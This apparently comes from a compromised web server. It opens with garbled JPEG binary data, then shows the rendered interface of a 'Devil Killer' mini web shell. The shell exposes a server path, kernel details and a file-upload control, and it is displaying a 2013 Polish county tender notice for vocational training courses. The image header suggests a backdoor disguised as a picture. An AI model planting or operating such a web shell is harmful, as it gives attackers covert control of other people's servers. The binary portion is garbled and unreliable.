JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130123/32498-N-2013.html

<p class="kh_header"><b>Zawiercie: Zorganizowanie i przeprowadzenie szkoleń zawodowych dla uczniów szkół ponadgimnazjalnych Powiatu Zawierciańskiego</b><br>
<b>Numer ogłoszenia: 32498 - 2013; data zamieszczenia: 23.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Zawierciański Starostwo Powiatowe , ul. Sienkiewicza 34, 42-400 Zawiercie, woj. śląskie, tel. 32 6710710-2 w. 551, faks 32 6721971.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń zawodowych dla uczniów szkół ponadgimnazjalnych Powiatu Zawierciańskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń zawodowych w zakresie obsługi maszyn i urządzeń dla uczniów ponadgimnazjalnych szkół zawodowych  Powiatu Zawierciańskiego, w ramach projektu Mam zawód - mam pracę w regionie współfinansowanego ze środków Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007-2013, Priorytet IX Działanie 9.2 - Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.
Przedmiot zamówienia został podzielony na 7 części (Zadania). Wykonawca może złożyć ofertę na jedną, kilka lub wszystkie części zamówienia, przy czym każdy wykonawca może złożyć tylko jedną ofertę sam lub jako partner w konsorcjum. Wykonawca, który przedkłada lub partycypuje w więcej niż jednej ofercie spowoduje, że wszystkie oferty z udziałem tego Wykonawcy zostaną odrzucone..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagania szczegółowe dla wykonawcy: wpis do Rejestru Instytucji  Szkoleniowych -  ocena spełnienia warunku w trybie art. 44 ustawy Pzp na podstawie Oświadczenia (Załącznik nr 3 do SIW) metodą graniczną spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1 - wykazanie wykonania, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamkniętych szkoleń grupowych w zakresie spawania elektrycznego E-111 o liczbie uczestników nie mniejszej niż 5 osób oraz co najmniej 2 zamkniętych szkoleń grupowych w zakresie spawania w osłonie gazowej metodą MAG 135 o liczbie uczestników nie mniejszej niż 10 osób, 
Zadanie 2 - wykazanie wykonania, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamkniętych szkoleń grupowych w zakresie kierowcy/operatora wózka jezdniowego oraz bezpiecznej wymiany butli gazowej o liczbie uczestników nie mniejszej niż 15 osób. 
Zadanie 3 - wykazanie wykonania, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamkniętych szkoleń grupowych w zakresie eksploatacji instalacji i urządzeń elektrycznych o liczbie uczestników nie mniejszej niż 5 osób.

Zadanie 4 - wykazanie wykonania, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 zamkniętego szkolenia grupowego o liczbie uczestników co najmniej 10 osób w zakresie obsługi suwnic sterowanych z kabiny IS.

Zadanie 5 - wykazanie wykonania, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamkniętych szkoleń grupowych operatora koparko-ładowarki w zakresie III klasy uprawnień o liczbie uczestników nie mniejszej niż 10 osób.

Zadanie 6 - wykazanie wykonania, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamkniętych szkoleń grupowych w zakresie obsługi pilarki spalinowej o liczbie uczestników nie mniejszej niż 5 osób.
Zadanie 7 - wykazanie wykonania, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 zamkniętego szkolenia grupowego w zakresie obsługi obrabiarek CNC na poziomie zaawansowanym,  o liczbie uczestników nie mniejszej niż 5 osób.
Ocena spełnienia warunku na podstawie dokumentów metoda graniczną spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1 - wykazanie, że wykonawca dysponuje lub będzie dysponował pomieszczeniem warsztatowym - spawalnią, w którym znajdują się co najmniej 4 szkoleniowe stanowiska spawalnicze (co najmniej po 2 dla każdej z metod) wyposażone w odpowiednie urządzenia spawalnicze wraz z oprzyrządowaniem i niezbędnymi materiałami spawalniczym. Stan techniczny urządzeń spawalniczych, zgodnie z wytycznymi IS, powinien zapewnić odpowiedni poziom szkolenia oraz kontrolę parametrów spawania wyszczególnionych np. w instrukcji technologicznej spawania.

Zadanie 2 - wykazanie, że wykonawca dysponuje lub będzie dysponował odpowiednią liczbą wózków jezdniowych podnośnikowych dopuszczonych do eksploatacji przez UDT -co najmniej 1 wózek o napędzie gazowym. 

Zadanie 3 - Zamawiający nie stawia wymagań szczegółowych w tym zakresie - ocena spełnienia warunku w trybie art. 44 ustawy Pzp na podstawie Oświadczenia (Załącznik nr 3 do SIW. 

Zadanie 4 - wykazanie, że wykonawca dysponuje lub będzie dysponował co najmniej jedną suwnicą sterowaną z kabiny. 

Zadanie 5 - wykazanie, ze wykonawca dysponuje lub będzie dysponował placem szkoleniowym oraz co najmniej jedną koparko-ładowarką, dopuszczoną do eksploatacji, zapewniającą odpowiedni poziom szkolenia.

Zadanie 6 - wykazanie, że wykonawca dysponuje lub będzie dysponował co najmniej 2 pilarkami spalinowymi w stanie technicznym zapewniającym spełnienie wymogów BHP oraz odpowiedni poziom szkolenia. 
Zadanie 7 -  wykazanie, ze wykonawca dysponuje lub będzie dysponował co najmniej jedną tokarką i jedną frezarką -  sterowanymi numerycznie wraz z oprzyrządowaniem i zestawem niezbędnych narzędzi oraz co najmniej dwoma zestawami komputerowymi z pulpitem operatorskim i licencjonowanym oprogramowaniem symulującym pracę sterownika i systemem symulacyjnym.
Ocena spełnienia warunku na podstawie dokumentów metoda graniczną spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1 - wykazanie, że wykonawca dysponuje lub będzie dysponował co najmniej 1 osobą posiadającą wyższe wykształcenie techniczne, uprawnienia pedagogiczne, zweryfikowaną przez Instytut Spawalnictwa i uprawnioną do szkolenia teoretycznego spawaczy oraz co najmniej 2 osobami (zweryfikowanymi przez IS) posiadającymi uprawnienia spawacza i instruktora zajęć praktycznych - zgodnie z obowiązującymi przepisami i wytycznymi Instytutu Spawalnictwa w Gliwicach.

Zadanie 2 - wykazanie, że wykonawca dysponuje lub będzie dysponował co najmniej 1 osobą posiadającą wyższe wykształcenie techniczne i uprawnienia pedagogiczne uprawniające do prowadzenia zajęć teoretycznych oraz co najmniej 2 osobami posiadającymi uprawnienia do szkolenia praktycznego w zakresie kierowcy/operatora wózka jezdniowego lub bezpiecznej wymiany butli gazowej - zgodnie z obowiązującymi przepisami i wytycznymi UDT lub Ośrodka Doskonalenia Kadr w Mysłowicach.

Zadanie 3 - wykazanie, że wykonawca dysponuje lub będzie dysponował co najmniej 1 osobą posiadającą wyższe wykształcenie kierunkowe, uprawnienia pedagogiczne i odpowiednie uprawnienia SEP wymagane do prowadzenia szkolenia, zgodnie z  Ustawą z dnia 10 kwietnia 1997r. Prawo energetyczne (Dz. U. z 2006 r., Nr 89 poz. 625 ze zmianami) oraz Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń instalacji i sieci (Dz. U. z 2003 r., Nr 89, poz. 828) i wytycznymi Stowarzyszenia Elektryków Polskich.

Zadanie 4 - wykazanie, że wykonawca dysponuje lub będzie dysponował co najmniej jedną osobą posiadającą wyższe wykształcenie techniczne i uprawnienia pedagogiczne uprawniające do prowadzenia zajęć teoretycznych oraz co najmniej 1 osobą  posiadającą uprawnienia do prowadzenia zajęć praktycznych w zakresie obsługi suwnic zgodnie z obowiązującymi przepisami oraz wytycznymi UDT lub Ośrodka Doskonalenia Kadr w Mysłowicach.

Zadanie 5 - wykazanie, ze wykonawca dysponuje lub będzie dysponował odpowiednią liczbą wykładowców (zweryfikowanych przez IMBiGS) posiadających wyższe wykształcenie kierunkowe i uprawnienia pedagogiczne wymagane do prowadzenia zajęć teoretycznych dla operatorów koparko-ładowarki w określonych zakresach tematycznych oraz co najmniej 1 osobą posiadającą uprawnienia instruktora zajęć praktycznych w zakresie obsługi koparko-ładowarki zgodnie z obowiązującymi przepisami oraz wytycznymi IMBiGS. 

Zadanie 6 - wykazanie, że wykonawca dysponuje lub będzie dysponował odpowiednią kadrą szkoleniową, zweryfikowaną przez RDLP, posiadającą odpowiednie uprawnienia do prowadzenia szkolenia zakresie obsługi pilarki spalinowej - co najmniej jedną osobą posiadającą wyższe wykształcenie kierunkowe i uprawnienia pedagogiczne oraz co najmniej 1 osobą posiadającą uprawnienia do prowadzenia zajęć praktycznych w zakresie obsługi pilarki spalinowej.
Zadanie 7 - wykazanie, że wykonawca dysponuje lub będzie dysponował odpowiednią kadrą szkoleniową, posiadającą uprawnienia do szkolenia w zakresie programowania i obsługi obrabiarek CNC. Co najmniej jedna osoba winna posiadać wyższe wykształcenie techniczne i uprawnienia pedagogiczne do prowadzenia zajęć teoretycznych oraz co najmniej 2 osoby winny posiadać kwalifikacje instruktorów w zakresie obsługi obrabiarek CNC.
Ocena spełnienia warunku na podstawie dokumentów metoda graniczną spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w tym zakresie, ocena spełnienia warunku w trybie art. 44 ustawy Pzp na podstawie Oświadczenia (Załącznik nr 3 do SIW)metodą graniczną spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wpisu do Rejestru Instytucji Szkoleniowych - wykonawca powinien znajdować się na liście przedsiębiorców wpisanych do Rejestru Instytucji Szkoleniowych, dostępnej na stronie internetowej właściwego miejscowo Wojewódzkiego Urzędu Pracy (wykonawca może dołączyć wydruk ze strony internetowej WUP) - dotyczy wszystkich części zamówienia. 
Odpowiednio do zakresu składanej oferty na realizację usług szkolenia zawodowego dokumenty potwierdzające posiadanie:
-  Zgody Instytutu Spawalnictwa w Gliwicach na szkolenie spawaczy w zakresie spawania metodami E-111 i MAG 135 - dot. wyłącznie Zadania 1;
Zgody Urzędu Dozoru Technicznego lub Ministerstwa Gospodarki Ośrodek Doskonalenia Kadr w Mysłowicach na szkolenie kierowcy wózka jezdniowego i bezpiecznej wymiany butli gazowej lub na szkolenie w zakresie obsługi suwnic - dot. odpowiednio Zadania 2 lub Zadania 4;
Zgody Stowarzyszenia Elektryków Polskich na szkolenie w zakresie eksploatacji instalacji i urządzeń elektrycznych - dot. wyłącznie zadania 3;
Zgody Instytutu Mechaniki Budownictwa i Górnictwa Skalnego w Warszawie na szkolenie operatorów koparko-ładowarki - dot. wyłącznie Zadania 5
Zgody Regionalnej Dyrekcji Lasów Państwowych na szkolenie w zakresie obsługi pilarki spalinowej - dot. wyłącznie Zadnia 6.
Ocena spełnienia warunku na podstawie dokumentów metoda warunku granicznego Spełnia - Nie spełnia.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy - wypełniony i podpisany przez wykonawcę (wzór - Załącznik nr 1 do SIWZ) 
Plan kursu (wzór - Załącznik nr 2 do SIWZ)
Preliminarz kursu - wzór własny wykonawcy (lub wzór Zamawiającego - Załącznik nr 2a do SIWZ)
Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych. Pełnomocnictwo/umocowanie prawne powinno być złożone w oryginale lub notarialnie potwierdzonej kopii.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w przypadku zaistnienia następujących okoliczności:
ustawowej zmiany przepisów prawa w zakresie dotyczącym wykonania umowy, 
zmiany osób, które Wykonawca wskazał w Ofercie do realizacji przedmiotu zamówienia, na skutek wystąpienia nieprzewidzianych okoliczności takich jak: śmierć osoby, rezygnacja / odejście z pracy lub innych, uniemożliwiających należyte wykonanie obowiązków zgodnie z umową lub obowiązującym prawem. W takim jednak przypadku każda nowa osoba musi spełniać warunki określone przez Zamawiającego na etapie wyboru oferty w postępowaniu przetargowym, 
zmiany maszyn, urządzeń lub narzędzi wykazanych przez Wykonawcę w ofercie, na skutek wystąpienia nieprzewidzianych okoliczności takich jak np. awaria lub w przypadku uzupełnienia potencjału technicznego o elementy nie wymienione w ofercie, jeżeli jest to korzystne z punktu widzenia interesu publicznego. W takim przypadku wszystkie wprowadzone do realizacji umowy maszyny, urządzenia, narzędzia lub inne elementy potencjału technicznego muszą spełniać wymagania określone przez Zamawiającego na etapie wyboru oferty w przeprowadzonym przetargu.
zmiany wynikającej z warunków narzuconych Zamawiającemu przez instytucję pośredniczącą - Urząd Marszałkowski,
zmiany nazw, siedziby stron umowy, numeru konta bankowego, innych danych ewidencyjnych - nie stanowiących zmiany stron umowy,

Zmiany w treści umowy mogą zostać wprowadzone po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.

Zmiany w treści umowy wymagają formy pisemnej w postaci aneksu do umowy, podpisanego przez strony umowy, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zawiercie.powiat.pl;  http://bip.zawiercie.powiat.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Zawierciu
ul. Sienkiewicza 34, 42-400 Zawiercie,
Telefon: 32/ 67 107 10 do 12
Faks: 32/ 67 107 10 do 12 wew. 551
e-mail: sod@zawiercie.powiat.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2013 godzina 10:00, miejsce: Oferty należy składać w siedzibie Zamawiającego - Wydział Gospodarki Mieniem i Zamówień Publicznych - pokój 310 (III piętro) (w dni robocze od poniedziałku do piątku w godzinach pracy Urzędu) w termin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Mam zawód -mam pracę w regionie współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego  Priorytet IX Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego
Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursów spawania wg normy PN-EN ISO 4063.</p>
